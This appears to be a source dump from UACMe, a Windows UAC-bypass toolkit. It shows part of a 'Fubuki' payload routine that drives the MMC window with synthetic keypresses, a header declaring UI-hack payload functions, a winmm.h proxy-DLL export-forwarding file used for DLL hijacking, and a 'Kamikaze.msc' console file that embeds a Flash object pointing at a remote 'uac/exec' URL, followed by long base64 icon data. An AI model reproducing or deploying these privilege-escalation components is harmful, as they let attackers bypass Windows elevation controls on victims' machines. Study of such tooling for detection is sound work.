hwnd = FindWindow(L"MMCMainFrame", NULL);
if (hwnd)
break;
else {
Sleep(1000);
}
} while (--iRetry);
if (hwnd) {
SetForegroundWindow(hwnd);
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.dwFlags = 0;
ip.ki.wVk = VK_F1;
ucmxSendInput(1, &ip, sizeof(INPUT));
Sleep(1000);
}
else {
ucmDbgMsg(L"MMCMainFrame window not found\r\n");
}
TerminateProcess(shinfo.hProcess, 0);
CloseHandle(shinfo.hProcess);
}
}
================================================
FILE: Source/Fubuki/uihacks.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2019 - 2024
*
* TITLE: UIHACKS.H
*
* VERSION: 3.66
*
* DATE: 03 Apr 2024
*
* Fubuki UIAccess related code header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef struct _SEARCH_WND {
HWND hWnd;
ULONG ProcessId;
} SEARCH_WND, *PSEARCH_WND;
VOID ucmUIHackExecute(
_In_ LPWSTR lpPayload);
VOID ucmUIHackExecute2(
VOID);
================================================
FILE: Source/Fubuki/winmm.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018
*
* TITLE: WINMM.H
*
* VERSION: 3.04
*
* DATE: 10 Nov 2018
*
* WINMM forwarded import.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#pragma comment(linker, " /EXPORT:timeBeginPeriod=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeBeginPeriod")
#pragma comment(linker, " /EXPORT:timeEndPeriod=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeEndPeriod")
#pragma comment(linker, " /EXPORT:waveOutGetNumDevs=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetNumDevs")
#pragma comment(linker, " /EXPORT:midiInMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiInMessage")
#pragma comment(linker, " /EXPORT:midiOutGetErrorTextW=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutGetErrorTextW")
#pragma comment(linker, " /EXPORT:midiOutGetNumDevs=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutGetNumDevs")
#pragma comment(linker, " /EXPORT:midiOutMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutMessage")
#pragma comment(linker, " /EXPORT:midiOutPrepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutPrepareHeader")
#pragma comment(linker, " /EXPORT:midiOutReset=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutReset")
#pragma comment(linker, " /EXPORT:midiOutUnprepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutUnprepareHeader")
#pragma comment(linker, " /EXPORT:midiStreamClose=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamClose")
#pragma comment(linker, " /EXPORT:midiStreamOpen=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamOpen")
#pragma comment(linker, " /EXPORT:midiStreamOut=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamOut")
#pragma comment(linker, " /EXPORT:midiStreamPause=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamPause")
#pragma comment(linker, " /EXPORT:midiStreamPosition=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamPosition")
#pragma comment(linker, " /EXPORT:midiStreamProperty=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamProperty")
#pragma comment(linker, " /EXPORT:midiStreamRestart=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamRestart")
#pragma comment(linker, " /EXPORT:mixerGetControlDetailsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetControlDetailsW")
#pragma comment(linker, " /EXPORT:mixerGetDevCapsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetDevCapsW")
#pragma comment(linker, " /EXPORT:mixerGetLineControlsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetLineControlsW")
#pragma comment(linker, " /EXPORT:mixerGetLineInfoW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetLineInfoW")
#pragma comment(linker, " /EXPORT:mixerGetNumDevs=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetNumDevs")
#pragma comment(linker, " /EXPORT:mixerSetControlDetails=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerSetControlDetails")
#pragma comment(linker, " /EXPORT:PlaySoundW=\\\\?\\globalroot\\systemroot\\system32\\winmm.PlaySoundW")
#pragma comment(linker, " /EXPORT:timeGetDevCaps=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeGetDevCaps")
#pragma comment(linker, " /EXPORT:timeGetTime=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeGetTime")
#pragma comment(linker, " /EXPORT:timeKillEvent=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeKillEvent")
#pragma comment(linker, " /EXPORT:timeSetEvent=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeSetEvent")
#pragma comment(linker, " /EXPORT:waveInMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveInMessage")
#pragma comment(linker, " /EXPORT:waveOutClose=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutClose")
#pragma comment(linker, " /EXPORT:waveOutGetDevCapsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetDevCapsW")
#pragma comment(linker, " /EXPORT:waveOutGetErrorTextW=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetErrorTextW")
#pragma comment(linker, " /EXPORT:waveOutGetPosition=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetPosition")
#pragma comment(linker, " /EXPORT:waveOutGetVolume=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetVolume")
#pragma comment(linker, " /EXPORT:waveOutMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutMessage")
#pragma comment(linker, " /EXPORT:waveOutOpen=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutOpen")
#pragma comment(linker, " /EXPORT:waveOutPause=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutPause")
#pragma comment(linker, " /EXPORT:waveOutPrepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutPrepareHeader")
#pragma comment(linker, " /EXPORT:waveOutReset=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutReset")
#pragma comment(linker, " /EXPORT:waveOutRestart=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutRestart")
#pragma comment(linker, " /EXPORT:waveOutSetVolume=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutSetVolume")
#pragma comment(linker, " /EXPORT:waveOutUnprepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutUnprepareHeader")
#pragma comment(linker, " /EXPORT:waveOutWrite=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutWrite")
================================================
FILE: Source/Kamikaze/Kamikaze.msc
================================================
{D0918FB2-FDF5-4A21-A323-32DC7F4D67FE}
{C96401CF-0E17-11D3-885B-00C04F72C717}
{C96401CF-0E17-11D3-885B-00C04F72C717}
{C96401CC-0E17-11D3-885B-00C04F72C717}
{00000000-0000-0000-0000-000000000000}
{00000000-0000-0000-0000-000000000000}
{71E5B33E-1064-11D2-808F-0000F875A9CE}
Favorites
Shockwave Flash Object
https://hfiref0x.github.io/Beacon/uac/exec
Console Root
SUwBAQIABAAMABAAEAD/////IRD//////////0JNNgAAAAAAAAA2AAAAKAAAAEAAAAAQAAAAAQAg
AAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAACcnJ0tqamrJS0tLqgkJCRoAAAAAAAAAALSzs/+rq6v/
qqqq/6ioqP+op6f/p6en/6ampv+mpqb/pKSk/6Ojo/8nJydLampqyUtLS6oJCQkaAAAAAAAAAAC0
s7P/q6ur/6qqqv+oqKj/qKen/6enp/+mpqb/pqam/6SkpP+jo6P/AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACJiYnW
vLy8/6Wlpf+BgID/lZSU/5WUlP+2tLT/1NHR+dTR0fnU0dH51NHR+dTT0fnU09H51dPR+c/OzfKk
pKT/iYmJ1ry8vP+lpaX/gYCA/5WUlP+VlJT/trS0/9TR0fnU0dH51NHR+dTR0fnU09H51NPR+dXT
0fnPzs3ypKSk/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgYGBvNzc3P+1tbX/paCf/8a9vP/Gvbz/uLe3/9XS0f/N
ycn/zcnJ/83Jyf/Nycn/zcnJ/83Jyf/U0dH6pqam/4GBgbzc3Nz/tbW1/6Wgn//Gvbz/xr28/7i3
t//V0tH/zcnJ/83Jyf/Nycn/zcnJ/83Jyf/Nycn/1NHR+qampv8AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcXFyZW
VlaTOTk5dgQEBAgAAAAAAAAAALm4uP/Z1tb/zMjI/8zIyP/MyMj/zMjI/8zIyP/MyMf/0c3N+aam
pv8XFxcmVlZWkzk5OXYEBAQIAAAAAAAAAAC5uLj/2dbW/8zIyP/MyMj/zMjI/8zIyP/MyMj/zMjH
/9HNzfmmpqb/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8u7v/2NbV/8vH
xf/Lx8X/y8fF/8vHxf/Lx8X/ycfF/9DMzPmnp6f/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvLu7
/9jW1f/Lx8X/y8fF/8vHxf/Lx8X/y8fF/8nHxf/QzMz5p6en/wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUF
BQsBAQEEAAAAAAAAAAAAAAAAvb28/9jV1P/JxcT/ycXE/8nFxP/JxcT/ycXE/8nExP/Py8v5qKio
/wAAAAAFBQULAQEBBAAAAAAAAAAAAAAAAL29vP/Y1dT/ycXE/8nFxP/JxcT/ycXE/8nFxP/JxMT/
z8vL+aioqP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMF15eXneWVlZwQwMDCQAAAAAAAAAAMC/v//Y1NT/ycTE
/8nExP/JxMT/ycTE/8nExP/IxMT/z8vL+aqoqP8wMDBdeXl53llZWcEMDAwkAAAAAAAAAADAv7//
2NTU/8nExP/JxMT/ycTE/8nExP/JxMT/yMTE/8/Ly/mqqKj/AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACPj4/cwsLC
/6qqqv+AgID/lZSU/5WUlP/DwcD/2NXU/8nExP/JxMT/ycTE/8nExP/JxMT/yMTE/8/Ly/mrqqr/
j4+P3MLCwv+qqqr/gICA/5WUlP+VlJT/w8HA/9jV1P/JxMT/ycTE/8nExP/JxMT/ycTE/8jExP/P
y8v5q6qq/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAdnZ2rdvb2/+ysrL/qaOj/8a9vP/Gvbz/0M3M/+Hg4P/h3t7/
4N3e/+Dd3f/e3Nz/3trc/93a2v/g3d3/trS0/3Z2dq3b29v/srKy/6mjo//Gvbz/xr28/9DNzP/h
4OD/4d7e/+Dd3v/g3d3/3tzc/97a3P/d2tr/4N3d/7a0tP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8PDxhBQUF3
KioqXgEBAQIAAAAAAAAAANDNzf/HxcX/xcPD/8PBwP/Av7//vb28/7y7u/+5uLj/uLe3/7a0tP8P
Dw8YQUFBdyoqKl4BAQECAAAAAAAAAADQzc3/x8XF/8XDw//DwcD/wL+//729vP+8u7v/ubi4/7i3
t/+2tLT/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAlZSU/8a9vP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAJWUlP/Gvbz/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJWUlP/Gvbz/AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACVlJT/xr28/wAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACcn
J0uJiYn/jYqJ/wkJCRoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAnJydLiYmJ/42Kif8JCQkaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACJiYnWvLy8/6Wlpf81NTV+AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiYmJ1ry8vP+lpaX/NTU1fgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgYGB
vNzc3P+1tbX/Ly8vZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAIGBgbzc3Nz/tbW1/y8vL2cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcXFyZWVlaTOTk5dgQEBAgAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXFxcmVlZWkzk5OXYEBAQIAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABCTT4AAAAAAAAAPgAAACgAAABAAAAAEAAAAAEAAQAAAAAAgAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA==
SUwBAQEABAAMACAAIAD/////IRD//////////0JNNgAAAAAAAAA2AAAAKAAAAIAAAAAgAAAAAQAg
AAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0
s7P/s7Oz/7Ozsv+zsrL/s7Ky/7KwsP+ysLD/sLCw/7Cvr/+vr6//r66u/66srP+srKz/rKur/6ur
q/+qqqr/qKio/6inp/+np6f/pqam/6ampv+kpKT/o6Oj/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALa0
tP/U0dH51NHR+dTR0fnU0dH51NHR+dTR0fnU0dH51NHR+dTR0fnU0dH51NHR+dTR0fnU0dH51NHR
+dTR0fnU0dH51NHR+dTT0fnU09H51dPR+c/OzfKkpKT/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuLe3
/9LOzv/Oy8n/zcvJ/83Jyf/Nycn/zcnJ/83Jyf/Nycn/zcnJ/83Jyf/Nycn/w8XF/77Cw/+yt7f/
lZeX/6Cjo/+vrq7/zcnJ/83Jyf/Nycn/1NHR+qampv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5uLj/
0c7N/83Jyf/Nycn/zcnI/8zIyP/MyMj/zMjI/8zIx//MyMf/zMjH/8zIx//Oy8r/0tHR/7i7vP+P
kZH/vLq6/8fDw//MyMj/zMjI/8zIx//Rzc35pqam/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAJCQkPSUlJgHp6etp1dXXaPj4+gAcHBw8AAAAAAAAAALy7u//R
zc3/zMnI/8zIyP/MyMj/y8jH/8vHx//Lx8f/y8fH/8vHxf+rrrD/qKys/6Woqf+ipKX/nqGh/5ud
nv+Zmpr/lpiY/5OVlf+RkpL/ycfF/9DMzPmnp6f/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAE5OTn6pqan/tra2/7W1tf+bm5v/PT09fgAAAAAAAAAAvb28/9HN
zf/Mycj/zMjI/8vIx//Lx8f/y8fH/8vHx//Lx8X/ycXF/66ztP+NFhX/jRIO/4wODP+cDgz/ty8d
/8RINP/JRzL/xEgw/5SVlf/JxMT/z8vL+aioqP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAkJCQ3L29vf+9vb3/ubm5/7CwsP+Kior/lZSU/5WUlP/Av7//0c3N
/5WUlP+VlJT/lZSU/5WUlP8brET/G6xE/5WUlP+VlJT/srW3/5onHv+ZIBT/nw8A/64RAP/MTTn/
